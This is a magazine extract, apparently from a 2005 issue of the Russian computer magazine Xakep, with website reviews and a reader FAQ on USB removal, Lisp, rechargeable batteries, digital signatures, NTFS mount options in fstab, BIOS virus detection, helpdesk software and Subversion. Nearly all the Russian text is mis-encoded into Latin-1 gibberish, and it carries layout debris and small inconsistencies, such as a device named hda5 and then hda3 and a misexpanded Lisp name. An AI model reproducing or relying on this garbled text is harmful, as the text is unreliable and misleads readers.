Êàêèõ òîëüêî ýêçîòè÷åñêèõ ÿçûêîâ ïðîãðàììèðîâàíèÿ íå ñóùåñòâóåò â íàøå âðåìÿ! Âîò çàöåíè ÷óäî ðóññêîé ïðîãðàììåðñêîé ìûñëè — BARSIC (íå ïóòàòü ñ Áåéñèêîì). Êàê ñêàçàíî íà ñòðàíèöå ðàçðàáîò÷èêà, Áàðñèê ÿâëÿåòñÿ ìîùíûì ñðåäñòâîì ðàçðàáîòêè ïðèëîæåíèé óïðàâëåíèÿ íàó÷íûìè êîìïüþòåðèçèðîâàííûìè óñòàíîâêàìè, ìàòåìàòè÷åñêîãî ìîäåëèðîâàíèÿ, ïðîãðàììíîé àíèìàöèè, à òàêæå îáðàáîòêè è âèçóàëèçàöèè ôèçè÷åñêèõ äàííûõ. Áàðñèê ÷åì-òî íàïîìèíàåò Visual BASIC è Delphi. Âñÿ äîêóìåíòàöèÿ, ìàíóàëû ïî ÿçûêó è ñàì ÿçûê ñ ïðèìåðàìè ìîæíî ñâîáîäíî ñêà÷àòü ñ ñàéòà.

6

Ïðèêîñíèñü ê ïðåêðàñíîìó www.world-a art.ru Ãèäîì â ìèðå èñêóññòâà ïðèçâàí ïîñëóæèòü íàì ñàéò world-art.ru. Ïðîÿâëÿåòñÿ èñêóññòâî â òàêèõ îáëàñòÿõ, êàê ëèòåðàòóðà, æèâîïèñü è àíèìàöèÿ, à òàêæå êèíî è òåëåâèäåíèå.  ðàçäåëå æèâîïèñè ìîæíî îçíàêîìèòüñÿ ñ ïðåêðàñíûìè òâîðåíèÿìè õóäîæíèêîâ ðàçëè÷íûõ ñòèëåé ñî âñåãî ìèðà. Ëèòåðàòóðíûé óãîëîê ïîäåëåí ïî æàíðàì è íàñ÷èòûâàåò íå îäèí äåñÿòîê òûñÿ÷ ïðîèçâåäåíèé íà ëþáîé âêóñ. Íàæàâ íà ññûëêó «àíèìàöèÿ», òû ïîïàäåøü íà ñòðàíèöó ñ îáçîðàìè è ðåöåíçèÿìè íà àíèìàöèîííûå ðàáîòû, à â ðàçäåëå Êèíî è Ò ìîæíî áåç îñîáîãî òðóäà óâèäåòü âñå íîâèíêè èç ìèðà êèíåìàòîãðàôà, âûõîäÿùåãî íà ðîññèéñêèõ ýêðàíàõ, îçíàêîìèòüñÿ ñ áèîãðàôèÿìè ëåãåíäàðíûõ àêòåðîâ è îáñóäèòü ïîïóëÿðíûå è íå î÷åíü òåëåâèçèîííûå ïðîãðàììû è òåëåñåðèàëû.

Ìóçåé âèäåîèãð 7

www.vgmuseum.com

Íà ñâåòå ñóùåñòâóåò îãðîìíîå êîëè÷åñòâî âèäåîèãð. Âñå îíè, íà÷èíàÿ ñ òåòðèñà è çàêàí÷èâàÿ ïîñëåäíåé êâàêîé, ïî-ñâîåìó èíòåðåñíû è îðèãèíàëüíû. Ó êàæäîãî èç íàñ íàéäåòñÿ, ïî êðàéíåé ìåðå, ñ äåñÿòîê ëþáèìûõ èãð, ê êîòîðûì ìû, íåñìîòðÿ íà ïðîõîäÿùåå âðåìÿ, ãîòîâû âîçâðàùàòüñÿ âíîâü è âíîâü. Ñàéò www.vgmuseum.com ïðåäñòàâëÿåò ñîáîé îãðîìíûé

âèðòóàëüíûé ìóçåé èãð. Çäåñü ñîáðàíû èãðû ñàìûõ ðàçíûõ èãðîâûõ ñèñòåì è äàò âûïóñêà. Ïðè÷åì êîëè÷åñòâî ñîáðàííûõ çäåñü èãð ïðîñòî ïîðàæàåò: äëÿ ïÿòèäåñÿòè êîíñîëåé íàñ÷èòûâàåòñÿ ïîðÿäêà äâàäöàòè ïÿòè òûñÿ÷ èãðóøåê ñ ïîäðîáíûì îïèñàíèåì è ñêðèíøîòàìè. Ïîñòîÿííî ïóáëèêóþòñÿ âñå íîâûå îáçîðû è íîâîñòè ìèðà âèäåîèãð. À íà ôîðóìå òû ìîæåøü ïîîáùàòüñÿ ñ ãåéìåðàìè ñî âñåãî ìèðà.

Àíèìå-æóðíàë http://animemagazine.ru

Ýòîò ðåñóðñ áóäåò ïîëåçåí äëÿ îçíàêîìëåíèÿ âñåì ïîêëîííèêàì òâîð÷åñòâà àíèìàòîðîâ èç ñòðàíû âîñõîäÿùåãî ñîëíöà, èìåíóåìîãî â íàðîäå íå èíà÷å, êàê anime. Ñàéò ÿâëÿåòñÿ âèðòóàëüíûì îòîáðàæåíèåì æóðíàëà animemagazine è, íà÷èíàÿ ñ 2002 ãîäà, ïðåäîñòàâëÿåò âñåì æåëàþùèì îãðîìíîå êîëè÷åñòâî èíôîðìàöèè ïî äàííîé òåìå. Àâòîðû, ÿâëÿÿñü ÿðûìè ïîêëîííèêàìè anime-èñêóññòâà, ïóáëèêóþò äîâîëüíî èíòåðåñíûå ñòàòüè è îáçîðû êàê ñîâñåì íîâûõ ñåðèàëîâ, òàê è êëàññèêè æàíðà. Ïóáëèêóþòñÿ ðàáîòû ÷èòàòåëåé æóðíàëà, è âåäåòñÿ èõ àêòèâíîå îáñóæäåíèå. Ïîäðîáíî ðàññêàçûâàåòñÿ î íîâèíêàõ èç ìèðà àíèìåèãð è äðóæåñòâåííûõ online anime-ðåñóðñàõ Ñåòè. Ðåãóëÿðíî ïðîâîäÿòñÿ ãîëîñîâàíèÿ è åæåíåäåëüíûå òîïðåéòèíãè íîâèíîê èíäóñòðèè ìóëüòôèëüìîâ.

8

Âñå ïðî ÷àñû http://watch.ru

 íàñòîÿùåå âðåìÿ ÷àñû äëÿ íàñ ïðåâðàòèëèñü âî ÷òîòî ñîâñåì îáûäåííîå è ïðèâû÷íîå. À âåäü ÷àñû - ýòî íå òîëüêî ïðèáîð, ïîêàçûâàþùèé êîòîðûé ÷àñ, ýòî öåëûé ìèð, ñî÷åòàþùèé â ñåáå ðàçëè÷íûå ãðàíè òâîð÷åñòâà è îäíîâðåìåííî òåõíè÷åñêèå âîçìîæíîñòè ñîâðåìåííîé ìûñëè. Èíôîðìàöèîííîå ýëåêòðîííîå èçäàíèå www.watch.ru ïðèçâàíî ðàññêàçàòü íàì îáî âñåì, ÷òî êàñàåòñÿ ìèðà ÷àñîâ. Íà ñàéòå ñîáðàíà ñàìàÿ ðàçëè÷íàÿ èíôîðìàöèÿ.  ìàñòåðñêîé âàñ íàó÷àò ÷èíèòü è ïðàâèëüíî ïîëüçîâàòüñÿ ÷àñàìè, â áèáëèîòåêå ïðåäëîæàò îçíàêîìèòüñÿ ñ èçäàíèÿìè, ïîñâÿùåííûìè ÷àñîâîìó äåëó. Çàéäÿ ïî ëèíêó «÷àñîâûå ìàðêè», òû îçíàêîìèøüñÿ ñî âñåì ðàçíîîáðàçèåì ïðîèçâîäèòåëåé ÷àñîâ ñî âñåõ êîíöîâ ñâåòà.

9

4

9

6

5

7

8


ÞÍÈÒÛ ///// ISSUE

FAQ FAQ comments:

ÑÒÅÏÀÍ ÈËÜÈÍ AKA STEP

faq@real.xakep.ru _units

140

XÀÊÅÐ 01 /85/ 05


Q: Äëÿ îòêëþ÷åíèÿ USB-ä äåâàéñîâ â âèíäå ïðåäóñìîòðåíî ñïåöèàëüíîå ñðåäñòâî — áåçîïàñíîå îòêëþ÷åíèå óñòðîéñòâ. Íèêîãäà èì íå ïîëü çîâàëñÿ è íè îäíîãî óñòðîéñòâà ïîêà íå èñïîð òèë. Ïîýòîìó è ñïðàøèâàþ: íàñêîëüêî íóæíà ýòà óòèëèòà îò Microsoft? Âñå ìîè äðóçüÿ ïîëüçóþòñÿ åé áåçîãîâîðî÷íî (áîÿòñÿ è ñïîðòèòü ôëåøêè), íî ìíå ñìûñë åå èñïîëüçîâàíèÿ ïðåäñòàâëÿåòñÿ âåñüìà ñîìíèòåëüíûì. A: Óòèëèòà äëÿ áåçîïàñíîãî èçâëå÷åíèÿ óñòðîéñòâ, âñòðîåííàÿ â âèíäó, äåéñòâèòåëüíî ìîæåò áûòü ïîëåçíà, íî ëèøü èíîãäà, äà è òî â î÷åíü ðåäêèõ ñëó÷àÿõ. Ñïåöèôèêàöèÿ USB èçíà÷àëüíî ïðåäóñìàòðèâàåò ãîðÿ÷åå ïîäêëþ÷åíèå è îòêëþ÷åíèå äåâàéñîâ, ïîýòîìó òó æå ôëåøêó ìîæíî ñîâåðøåííî áåçîïàñíî äåìîíòèðîâàòü èç êîìïüþòåðà â ëþáîé ìîìåíò. Ïóñêàé íà íåå ñ îãðîìíîé ñêîðîñòüþ ïåðåäàþòñÿ äàííûå: ïîñëå îòêëþ÷åíèÿ õóæå åé â ëþáîì ñëó÷àå íå ñòàíåò. Äðóãîå äåëî, ÷òî ÷àñòü äàííûõ (âîçìîæíî, èñêëþ÷èòåëüíîé âàæíîñòè) íà íåå íå ïîïàäóò. Ïîíèìàåøü, êóäà ÿ êëîíþ? Äëÿ òîãî è íóæíî ýòî «áåçîïàñíîå èçâëå÷åíèå óñòðîéñòâ», ÷òîáû ïðåäîòâðàòèòü ïîòåíöèàëüíóþ ïîòåðþ äàííûõ è íåãàòèâíîå âëèÿíèå íà ðàáîòó ïðèëîæåíèé è ñèñòåìû â öåëîì. Ïðèíöèï ïðîñò: åñëè â äàííûé ìîìåíò USB-óñòðîéñòâî íå èñïîëüçóåòñÿ — ìîæíî îòêëþ÷àòü. Åñëè ê íåìó îñóùåñòâëÿþòñÿ îáðàùåíèÿ — ëó÷øå íå ñòîèò. Q: Ðàññêàæè â äâóõ ñëîâàõ, ÷òî ñîáîé ïðåäñòàâëÿåò ÿçûê Lisp. ×åì îí îòëè÷àåòñÿ îò âñåõ îñòàëüíûõ? Ïî÷åìó íåêîòîðûå àâòîðèòåòíûå ïðîãðàììåðû èñïîëüçóþò åãî â ñâîèõ ïðîåêòàõ? A: Íàçâàíèå Lisp èäåò îò äâóõ àíãëèéñêèõ ñëîâ Lisp Processing, ÷òî â ïåðåâîäå íà ðóññêèé îçíà÷àåò «îáðàáîòêà ñïèñêà». Ëèñï — ýòî ïåðâûé ôóíêöèîíàëüíûé ÿçûê ïðîãðàììèðîâàíèÿ, êîòîðûé àêòèâíî èñïîëüçóåò ñïèñî÷íûå ñòðóêòóðû äëÿ ðàáîòû ñ èíôîðìàöèåé è õðàíåíèÿ äàííûõ. Íà ñïèñêàõ ïîñòðîåíî âñå. Äàííûå ïðåäñòàâëÿþòñÿ â âèäå ñïèñêà. Ëþáàÿ ôóíêöèÿ — ñâîåîáðàçíûé ñïèñîê, èìåþùèé íåñêîëüêî âõîäíûõ è âûõîäíûõ ïàðàìåòðîâ. Ñàìà ïðîãðàììà íà ëèñïå — ýòî òîæå ñïèñîê, ñîñòîÿùèé èç ïîñëåäîâàòåëüíîñòè ôóíêöèé. Îäíîðîäíûé ïîäõîä ê ïðåäñòàâëåíèþ ëþáûõ äàííûõ è ñòðóêòóð, â òîì ÷èñëå óïðàâëÿþùèõ, ïîçâîëÿåò ñîçäàâàòü ìîùíûå êîìïëåêñû, êîòîðûå ïðè íåîáõîäèìîñòè ìîãóò ñàìîìîäèôèöèðîâàòüñÿ è äîïèñûâàòü ÷àñòè ñîáñòâåííîãî êîäà. Áåç ïðàêòèêè «âúåõàòü» âî âñå ýòî äîâîëüíî ñëîæíî, ïîýòîìó ðåêîìåíäóþ îïðîáîâàòü âñå ñàìîìó. Äëÿ ýòîãî òåáå ïîíàäîáèòñÿ îäíà èç ðåàëèçàöèé Lisp'a (íàïðèìåð, CLISP — clisp.cons.org), òåêñòîâûé ðåäàêòîð, ïîääåðæèâàþùèé àâòîìàòè÷åñêîå âûðàâíèâàíèå êîäà è ïîäñâåòêó ñêîáîê (èíà÷å òû ðèñêóåøü çàïóòàòüñÿ â êîëîññàëüíîì êîëè÷åñòâå ñêîáîê), à òàêæå õîðîøèé ìàíóàë (www.dvo.ru/tech/lisp). Q:  ÷åì ðàçíèöà ìåæäó NiCd-,, NiMH-,, Li-IIon àêêóìóëÿòîðàìè?  áîëüøèíñòâå ñîâðåìåííûõ äåâàéñîâ óñòàíîâëåíû Li-IIon àêêóìû, íî íåäàâíî êóïèë ñåáå ôîòîàïïàðàò, ðàáîòàþùèé íà NiMH-« «áàòàðåéêàõ», êîòîðûå, ïî çàÿâëåíèþ äðóçåé, ÿâëÿþòñÿ ïðîøëûì âåêîì. Âîò, çàèíòåðåñîâàëñÿ.

XÀÊÅÐ 01 /85/ 05

A: Íèêåëü-êàäìèåâàÿ (NiCd) áàòàðåÿ áûëà ñîçäàíà åùå â äàëåêîì 1946 ãîäó è âïëîòü äî 90-õ îñòàâàëàñü íàèáîëåå ïîïóëÿðíûì òèïîì àêêóìóëÿòîðîâ. Íèêåëü ïðèìåíÿëñÿ äëÿ ïîëîæèòåëüíîãî ýëåêòðîäà, êàäìèé — äëÿ îòðèöàòåëüíîãî.  êà÷åñòâå ýëåêòðîëèòà èñïîëüçîâàëñÿ ãèäðîêñèä êàëèÿ (åäêîå êàëè). Êàäìèé ÿäîâèò è î÷åíü äîðîã â óòèëèçàöèè, ïîýòîìó NiCd-àêêóìóëÿòîðû ïîçæå çàïðåòèëè âî ìíîãèõ ñòðàíàõ ìèðà. Õîòÿ õàðàêòåðèñòèêè ïîäîáíûõ «áàòàðååê» âïå÷àòëÿþò: áûñòðîå âðåìÿ çàðÿäêè, âîçìîæíîñòü ðàáîòû äàæå ïðè î÷åíü íèçêèõ òåìïåðàòóðàõ, äëèòåëüíîå õðàíåíèå áåç ïîòåðè ìîùíîñòè è îãðîìíîå êîëè÷åñòâî öèêëîâ ïåðåçàðÿäêè — äî 1500. Íåäîñòàòêîì òàêîãî àêêóìóëÿòîðà ÿâëÿåòñÿ òàê íàçûâàåìûé ýôôåêò ïàìÿòè, êîòîðûé çíà÷èòåëüíî ñîêðàùàåò ìàêñèìàëüíî âîçìîæíûé çàïàñ ýíåðãèè è ïîÿâëÿåòñÿ â òîì ñëó÷àå, êîãäà ïðîèçâîäèòñÿ ïåðåçàðÿäêà íå äî êîíöà ðàçðÿæåííîãî àêêóìóëÿòîðà. Íèêåëü-ìåòàëëîãèäðèäíûå (NiMH) àêêóìóëÿòîðû ïðèøëè íà ñìåíó çàïðåùåííûì NiCd. Âìåñòî âûñîêîòîêñè÷íîãî êàäìèÿ ñòàëè ïðèìåíÿòü ñîåäèíåíèå ìåòàëëà ñ âîäîðîäîì. Ïîëó÷èëîñü íåïëîõî: ïëîòíîñòü íàêîïëåíèÿ ýíåðãèè ñòàëà äîñòèãàòü 120 Âò/êã, â òî âðåìÿ êàê ó íèêåëüêàäìèåâûõ àêêóìóëÿòîðîâ ýòîò ïîêàçàòåëü ñîñòàâëÿë ìàêñèìóì 80 Âò/êã. Íå îáîøëîñü è áåç íåäîñòàòêîâ: êîëè÷åñòâî öèêëîâ çàðÿä-ðàçðÿä óìåíüøèëîñü äî 500, à ðàáî÷àÿ òåìïåðàòóðà ïîäíÿëàñü ñ ìèíóñ 40 äî ìèíóñ 20 ãðàäóñîâ. Ëèòèåâî-èîííûå àêêóìóëÿòîðû (Li-Ion) ñåé÷àñ íàèáîëåå ðàñïðîñòðàíåíû. Îíè èñïîëüçóþòñÿ âåçäå: â ñîâðåìåííûõ ñîòîâûõ òåëåôîíàõ, ÊÏÊ, íîóòáóêàõ è ò.ï. Òàêèå áàòàðåè íå èìåþò ýôôåêòà ïàìÿòè, ïîýòîìó èõ ìîæíî çàðÿæàòü, êîãäà çàõî÷åòñÿ. Êîëè÷åñòâî ïîäçàðÿäîê ìîæåò äîñòèãàòü äî 1000—1200 ðàç. Ïðè÷åì ïëîòíîñòü çàðÿäà ó LiIon äîñòèãàåò 160 Âò/êã, à ñòåïåíü âíóòðåííèõ ýíåðãåòè÷åñêèõ ïîòåðü ñîñòàâëÿåò âñåãî 10% åìêîñòè â ìåñÿö. Åñòü, ïðàâäà, îäíî «íî»: ëèòèåâîèîííûå àêêóìóëÿòîðû ñòàðåþò, òî åñòü ñ êàæäûì ãîäîì èõ ìàêñèìàëüíûé çàðÿä ñòàíîâèòñÿ âñå ìåíüøå è ìåíüøå. Ñ ýòèì íè÷åãî íå ïîäåëàåøü, íî íóæíî áûòü ãîòîâûì ÷åðåç 2—3 ãîäà âûäåëèòü ñðåäñòâà íà ïîêóïêó íîâîãî àêêóìóëÿòîðà. Ñóùåñòâóþò òàêæå ñâèíöîâî-êèñëîòíûå (Lead Acid) è ëèòèé-ïîëèìåðíûå (Li-Pol) àêêóìóëÿòîðû. Ïåðâûå ïðèìåíÿþòñÿ â èñòî÷íèêàõ áåñïåðåáîéíîãî ïèòàíèÿ, âòîðûå — â òîïîâûõ ìîäåëÿõ ñîòîâûõ òåëåôîíîâ. È òå, è äðóãèå ïîêà íå ïîëó÷èëè øèðîêîãî ðàñïðîñòðàíåíèÿ. Q: Êàê ðàáîòàåò ýëåêòðîííàÿ öèôðîâàÿ ïîäïèñü? Íåóæåëè îíà íàñòîëüêî áåçîïàñíà, ÷òî åå ñîñòîÿòåëüíîñòü ãàðàíòèðóåò äàæå çàêîíû Ðîññèè? A: Òû ïîìíèøü, ÷òî òàêîå êîíòðîëüíàÿ ñóììà (checksum)? Ýòî ïîñëåäîâàòåëüíîñòü áàéòîâ, êîòîðàÿ ïîëó÷åíà ïóòåì ïðåîáðàçîâàíèÿ èñõîäíûõ äàííûõ ïî ñïåöèàëüíîìó àëãîðèòìó (íàïðèìåð, MD5). Ïîäîáíàÿ ïîñëåäîâàòåëüíîñòü óíèêàëüíà: âåðîÿòíîñòü òîãî, ÷òî èäåíòè÷íàÿ êîíòðîëüíàÿ ñóììà áóäåò ïîëó÷åíà äëÿ äðóãèõ äàííûõ, ñòðåìèòñÿ ê íóëþ. Ýòî ïðåäïîëîæåíèå ëåãëî â îñíîâó ïðîñòîãî ìåòîäà äëÿ ñðàâíåíèÿ ôàéëîâ: åñëè checksum ñîâïàäàþò, òî èñõîäíûå äàííûå èäåíòè÷íû.

Íà áàçå êîíòðîëüíûõ ñóìì ïîñòðîåíà è ýëåêòðîííàÿ öèôðîâàÿ ïîäïèñü (ÝÖÏ). Äîïóñòèì, åñòü ÷åëîâåê À, êîòîðûé õî÷åò ïåðåäàòü ñîîáùåíèå ÷åëîâåêó Á, ïðè÷åì ìåññàãà äîëæíà áûòü çàùèùåíà ýëåêòðîííîé öèôðîâîé ïîäïèñüþ (ÝÖÏ). Äëÿ ýòîãî åìó ïîòðåáóåòñÿ äâà êëþ÷à. Îäèí èç íèõ — ñåêðåòíûé, îí ñîçäàåòñÿ îäèí ðàç è íèêîãäà íå äîëæåí ïîïàäàòü â ðóêè ïîñòîðîííèì. Íà áàçå ñåêðåòíîãî êëþ÷à ãåíåðèðóåòñÿ åùå îäèí — ïóáëè÷íûé, êîòîðûé äîëæåí áûòü îòïðàâëåí àäðåñàòàì èëè âûëîæåí íà ðåñóðñå ñî ñâîáîäíûì äîñòóïîì. Äëÿ çàùèòû ñîîáùåíèÿ ýëåêòðîííîé ïîäïèñüþ ïðîèñõîäèò ñëåäóþùåå: 1 Âû÷èñëÿåòñÿ êîíòðîëüíàÿ ñóììà (õýø) ôàéëà ïèñüìà. 2 Ïîëó÷åííûé õýø øèôðóåòñÿ ñåêðåòíûì êëþ÷îì. Íà âûõîäå ïîëó÷àåòñÿ òà ñàìàÿ ÝÖÏ, êîòîðàÿ ïðèêðåïëÿåòñÿ ê ïèñüìó è ãàðàíòèðóåò åå ïîäëèííîñòü. Ñ åå ïîìîùüþ ïîëó÷àòåëü ìîæåò ïðîâåðèòü ïîäëèííîñòü ñîäåðæèìîãî ñîîáùåíèÿ. Ýòî ïðîèñõîäèò ïðèáëèçèòåëüíî òàê: 1 Ñíà÷àëà ïîëó÷åííûé êîä ðàñøèôðîâûâàåòñÿ ñ ïîìîùüþ ïóáëè÷íîãî êëþ÷à — ïîëó÷àåòñÿ êîíòðîëüíàÿ ñóììà, êîòîðàÿ áûëà ïîëó÷åíà íà ñòîðîíå îòïðàâèòåëÿ. 2 Äàëåå checksum ãåíåðèðóåòñÿ íà ñòîðîíå ïîëó÷àòåëÿ è ñâåðÿåòñÿ ñ òîé, ÷òî ïîëó÷åíà èç ïîäïèñè.  ñëó÷àå, åñëè êîíòðîëüíûå ñóììû èäåíòè÷íû, ìîæíî ñóäèòü î äîñòîâåðíîñòè ñîîáùåíèÿ. ß íàìåðåííî íå ñòàë âäàâàòüñÿ â ìàòåìàòè÷åñêèå ïîäðîáíîñòè, òàê êàê âñå äîêàçàòåëüñòâà è îáîñíîâàíèÿ ìîæíî íàéòè â îïèñàíèÿõ àëãîðèòìîâ RSA, MD5, DSA, SHA-1. Q: ALT Linux ïðè çàïóñêå ìîíòèðóåò âñå NTFSðàçäåëû. Ýòî õîðîøî, íî äîñòóï ê íèì èìååò èñêëþ÷èòåëüíî root. Ïðîñòûì ïîëüçîâàòåëÿì ñèñòåìà äàåò îòâîðîò-ï ïîâîðîò, âûäàâàÿ ñîîáùåíèå î íåäîñòàòî÷íîñòè ïðàâ. Êàê æå ìîæíî ñäåëàòü ýòè ðàçäåëû äîñòóïíûìè äëÿ âñåõ þçåðîâ? A: Äëÿ íà÷àëà îòêðîé /etc/fstab — êîíôèãóðàöèîííûé ôàéë, â êîòîðîì îáîçíà÷àþòñÿ äåâàéñû è ðàçäåëû æåñòêèõ äèñêîâ äëÿ ìîíòèðîâàíèÿ. Òàì òû óâèäèøü ïðèìåðíî ñëåäóþùóþ ñòðî÷êó: /dev/hda5 /mnt/ntfs ntfs utf8,nls=koi8-u 0 1 /dev/hda3 — ýòî, êàê òû äîãàäàëñÿ, òâîé NTFS-ðàçäåë. /mnt/ntfs — òî÷êà ìîíòèðîâàíèÿ Äàëåå ñëåäóþò ïàðàìåòðû ìîíòèðîâàíèÿ: âûáîð êîäèðîâêè, òàáëèöû ñèìâîëîâ è ò.ä. Äëÿ ïîëíîãî ñ÷àñòüÿ òàì íå õâàòàåò îïöèè, êîòîðàÿ îòâå÷àåò çà ïðàâà äîñòóïà ê ïðèìîíòèðîâàííîìó ðàçäåëó. Åñëè ðàçäåë èìååò ïðàâà 000, òî äîñòóï ê íåìó áóäåò îòêðûò äëÿ âñåõ ïîëüçîâàòåëåé áåç èñêëþ÷åíèÿ. Ïîñëå âíåñåííûõ èçìåíåíèé ñòðîêà äëÿ ìîíòèðîâàíèÿ NTFS-ðàçäåëà áóäåò âûãëÿäåòü ñëåäóþùèì îáðàçîì:

/dev/hda5 /mnt/ntfs u,umask=000 0 1.

ntfs

utf8,nls=koi8-

Q:  ëþáîì ÁÈÎÑå åñòü ïóíêò Boot Virus Detection. Íå ïðèïîìíþ, ÷òîáû îí õîòÿ áû ðàç íàõîäèë âèðóñ. Ýòîò àíòèâèðóñ ðàáîòàåò? A: Åùå êàê ðàáîòàåò. Ïðàâäà, ýòî íå àíòèâèðóñ, à âñåãî ëèøü äåòåêòîð âèðóñîâ. È çàðàçó îí íàõîäèò íå âñþ ïîäðÿä, à òîëüêî çàãðóçî÷íóþ, êîòîðàÿ ìîæåò çàïèñàòü ñåáÿ âî flash-ïàìÿòü

141


ÞÍÈÒÛ ///// ISSUE

ÇÀÄÀÂÀß ÂÎÏÐÎÑ, ÏÎÄÓÌÀÉ! ÍÅ ÑÒÎÈÒ ÌÍÅ ÏÎÑÛËÀÒÜ ÂÎÏÐÎÑÛ, ÒÀÊ ÈËÈ ÈÍÀ×Å ÑÂßÇÀÍÍÛÅ Ñ ÕÀÊÎÌ/ÊÐÝÊÎÌ/��ÐÈÊÎÌ — ÄËß ÝÒÎÃÎ ÅÑÒÜ HACK-FAQ (HACKFAQ@REAL.XAKEP.RU), ÍÅ ÑÒÎÈÒ ÒÀÊÆÅ ÇÀÄÀÂÀÒÜ ÎÒÊÐÎÂÅÍÍÎ ËÀÌÅÐÑÊÈÅ ÂÎÏÐÎÑÛ, ÎÒÂÅÒ ÍÀ ÊÎÒÎÐÛÅ ÒÛ ÏÐÈ ÎÏÐÅÄÅËÅÍÍÎÌ ÆÅËÀÍÈÈ ÌÎÆÅØÜ ÍÀÉÒÈ È ÑÀÌ. ß ÍÅ ÒÅËÅÏÀÒ, ÏÎÝÒÎÌÓ ÊÎÍÊÐÅÒÈÇÈÐÓÉ ÂÎÏÐÎÑ, ÏÐÈÑÛËÀÉ ÊÀÊ ÌÎÆÍÎ ÁÎËÜØÅ ÈÍÔÎÐÌÀÖÈÈ. êîìïüþòåðà. Ïðàâäà, ñåãîäíÿ òàêèå âèðóñû íå î÷åíü ðàñïðîñòðàíåíû, ïîýòîìó íåîáõîäèìîñòü â ýòîé îïöèè âåñüìà ñîìíèòåëüíà. Ëó÷øå ïîñòàâü ñâåæèå àïäåéòû íà âèíäó. Q: Íåäàâíî îòêðûë ñåðâèñ ïî ïðîäàæå õîñòèíãóñëóã. ß äèðåêòîð, ìåíåäæåð ïî ïðîäàæàì è ñëóæáà ïîääåðæêè â îäíîì ëèöå. Ñî âñåì ïîêà óñïåøíî ñïðàâëÿþñü, íî êîíñóëüòèðîâàòü ïîëüçîâàòåëåé ïî ICQ äîâîëüíî íåóäîáíî. Õî÷åòñÿ îðãàíèçîâàòü òàê íàçûâàåìóþ HelpDesk, ÷òîáû ëþáîé êëèåíò ïðè ïîìîùè óäîáíîãî èíòåðôåéñà ìîã îñòàâèòü ñâîé òèêåò (çàÿâêó), èçëîæèâ â íåì ñóòü ïðîáëåìû, çàîäíî ïðåäîñòàâèâ äîïîëíèò åëüíûå äàííûå (êîíôèãóðàöèîííûå ôàéëû, âåðñèè ìîäóëåé äëÿ êîìïèëÿöèè êîíêðåòíîãî ÏÎ è ò.ä.). Êàêèì îáðàçîì ýòî ìîæíî îðãàíèçîâàòü? A: Ñàìûé î÷åâèäíûé âàðèàíò — ïîäíÿòü íà ñåðâåðå ñïåöèàëüíûé âåá-ñöåíàðèé. Èõ äîâîëüíî ìíîãî, íî ÿ ðåêîìåíäóþ îáðàòèòü âíèìàíèå íà @1 Helpdesk XP PHP V2 (upoint.net/myscripts/helpdesk.htm), Helpdesk software Hesk (www.phpjunkyard.com/free-helpdesksoftware.php), TicketMaster (www.jynx.net/tm), KBase Knowledge Base (scripts.tlcwe.com).  ýòîì ñëó÷àå ïîëüçîâàòåëü áóäåò ñîñòàâëÿòü òèêåòû ïðÿìî â îêíå áðàóçåðà, ÷åðåç îáû÷íûé âåá-èíòåðôåéñ. Îáñëóæèâàíèå òèêåòîâ òàêæå îñóùåñòâëÿåòñÿ ÷åðåç âåá-èíòåðôåéñ, ïðè ýòîì îáðàáîòêîé çàïðîñîâ ñìîãóò çàíèìàòüñÿ íåñêîëüêî ÷åëîâåê îäíîâðåìåííî.  ïðèíöèïå, ìîæíî îáîéòèñü áåç ñêðèïòîâ (è ãåìîððîÿ, ñâÿçàííîãî ñ èõ íàñòðîéêîé), âîñïîëüçîâàâøèñü ñïåöèàëüíî çàòî÷åííûìè äëÿ ýòîãî äåëà ïðîãðàììàìè. Áîëüøèõ äîñòèæåíèé â ýòîé îáëàñòè äîáèëàñü óòèëèòà ManageEngine ServiceDesk Plus (manageengine.adventnet.com/products/service-desk/). Íà ñàéòå åñòü êíîïî÷êà Live Demo, êîòîðàÿ íàãëÿäíî èëëþñòðèðóåò åå âîçìîæíîñòè, — íå õî÷åòñÿ èõ äóáëèðîâàòü. Ïðîãà âåñèò íåìàëî (~50 Ìá), îäíàêî íåñêîëüêî íîìåðîâ íàçàä âîøëà â ïîäáîðêó íàøåãî DVD. Q:  òðåáîâàíèÿõ ðàáîòîäàòåëÿ íåðåäêî ìîæíî âñòðåòèòü òàêîå òðåáîâàíèå: çíàíèå è óâåðåííàÿ ðàáîòà ñ Subversion. Çíàþ, ÷òî ýòî ñèñòåìà óïðàâëåíèÿ âåðñèÿìè, íî ÷åì îíà ëó÷øå ïîïóëÿðíîé CVS? A: ×òî âîîáùå ïðåäñòàâëÿåò ñîáîé ñèñòåìà óïðàâëåíèÿ âåðñèÿìè? Ýòî óäîáíûé èíñòðóìåíò, êî-

142

òîðûé ïîçâîëÿåò îòñëåæèâàòü èçìåíåíèÿ, âíîñèìûå â êîä ïðîåêòà, à òàêæå îðãàíèçîâûâàòü ñîâìåñòíóþ ðàáîòó íåñêîëüêèõ äåâåëîïåðîâ. CVS è Subversion äåéñòâèòåëüíî èìåþò îäíî è òî æå ïðåäíàçíà÷åíèå, ïîýòîìó ïîääåðæèâàåìûå ôóíêöèè ìàëî ÷åì îòëè÷àþòñÿ. Ïîäîáíî äðóãèì ñèñòåìàì, Subversion õðàíèò èåðàðõèþ âåðñèé ïðîåêòà (íàïðèìåð, ïåðâàÿ âåðñèÿ — 1.0, äàëåå — 1.1 è òàê äî òåêóùåé) â ñïåöèàëüíîì õðàíèëèùå — ðåïîçèòàðèè. Óïîëíîìî÷åííûé ðàçðàáîò÷èê âñåãäà ìîæåò âíåñòè â êîä èçìåíåíèÿ: äëÿ ýòîãî åìó íåîáõîäèìî âûïîëíèòü îïåðàöèþ Check out, êîòîðàÿ ñêîïèðóåò òðåáóåìûé ôàéë â ðàáî÷óþ äèðåêòîðèþ ïîëüçîâàòåëÿ, îòêóäà èñõîäíèê áóäåò äîñòóïåí äëÿ ðåäàêòèðîâàíèÿ. Ïîñëå òîãî êàê íóæíûå èçìåíåíèÿ áóäóò âíåñåíû, íåîáõîäèìî îáíîâèòü ôàéë â ðåïîçèòàðèè, ÷òî îñóùåñòâëÿåòñÿ ñ ïîìîùüþ îïåðàöèè Check in. Çäåñü åñòü îäèí íþàíñ. Ñèñòåìû óïðàâëåíèÿ âåðñèÿìè îáû÷íî áëîêèðóþò äîñòóï ê ôàéëàì, íàä êîòîðûìè â òåêóùèé ìîìåíò ðàáîòàåò îäèí èç ðàçðàáîò÷èêîâ. Òî åñòü äëÿ äðóãèõ ïðîãðàììèñòîâ îí ñòàíîâèòñÿ íåäîñòóïíûì äëÿ 